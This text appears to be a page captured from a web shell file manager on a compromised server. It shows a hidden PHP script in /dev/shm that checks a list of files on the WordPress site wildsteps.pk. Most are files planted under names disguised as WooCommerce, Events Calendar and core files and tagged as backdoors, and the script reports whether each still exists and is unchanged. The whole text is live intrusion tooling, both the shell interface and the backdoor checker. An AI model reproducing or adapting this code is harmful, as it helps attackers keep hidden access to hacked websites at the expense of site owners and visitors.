D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
thread-self
/
root
/
proc
/
self
/
root
/
dev
/
shm
/
Filename :
.res
back
Copy
<?php $r = '/home/onewfkmk/wildsteps.pk'; $x = ["/wp-content/plugins/the-events-calendar/common/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler.Abstract.QueueRunner.php"=>"bd@@136715@@648", "/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Parsers/Drafts/newCourseLink.php"=>"bd@@136716@@558", "/wp-content/plugins/the-events-calendar/common/src/Common/Key_Value_Cache/Table/deleteCourseLink.php"=>"bd@@136719@@1582", "/wp-content/plugins/the-events-calendar/common/build/js/admin/conditional-content.asset.php"=>"bd@@177182@@token_parser_engine", "/wp-content/plugins/woocommerce/assets/js/frontend/test/prova_java_php.php"=>"bd@@134710@@1868", "/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/V3/Auth/Contracts/Auth.Url.php"=>"bd@@177212@@1852", "/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Handler/Curl/rabbitoshi.php"=>"bd@@177217@@1958", "/wp-content/plugins/the-events-calendar/common/src/Common/REST/TEC/V1/Contracts/Endpoint.Interface.php"=>"bd@@177221@@1542", "/wp-content/plugins/the-events-calendar/common/src/Common/Admin/Help_Hub/Section_Builder/Section.Helper.Interface.php"=>"bd@@177225@@1527", "/wp-content/plugins/the-events-calendar/common/src/admin-views/components/integration/create.button.php"=>"bd@@177232@@2949", "/wp-content/plugins/redux-framework/redux-core/inc/extensions/icon_select/icon_select/index.redux.icon.select.php"=>"bd@@134779@@568", "/wp-content/plugins/the-events-calendar/common/src/Tribe/Customizer/Controls/Range.php"=>"bd@@134785@@2465", "/wp-content/plugins/woocommerce/packages/email-editor/src/Engine/Logger/class.email.email.logger.interface.php"=>"bd@@134786@@1480", "/wp-content/plugins/woocommerce/src/Admin/API/Reports/Taxes/form_upload.php"=>"bd@@134787@@1900", "/wp-includes/customize/class-wp-customize-nav-menu-section.php"=>"bd@@136663@@data_storage", "/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Handler/easiertube.php"=>"bd@@136688@@1502", "/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/stellarwp/uplink/src/Uplink/API/V3/Auth/Token_Url.php"=>"ui@@2540@@97537", "/index.php"=>"ui@@2540@@Token_Url.php"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');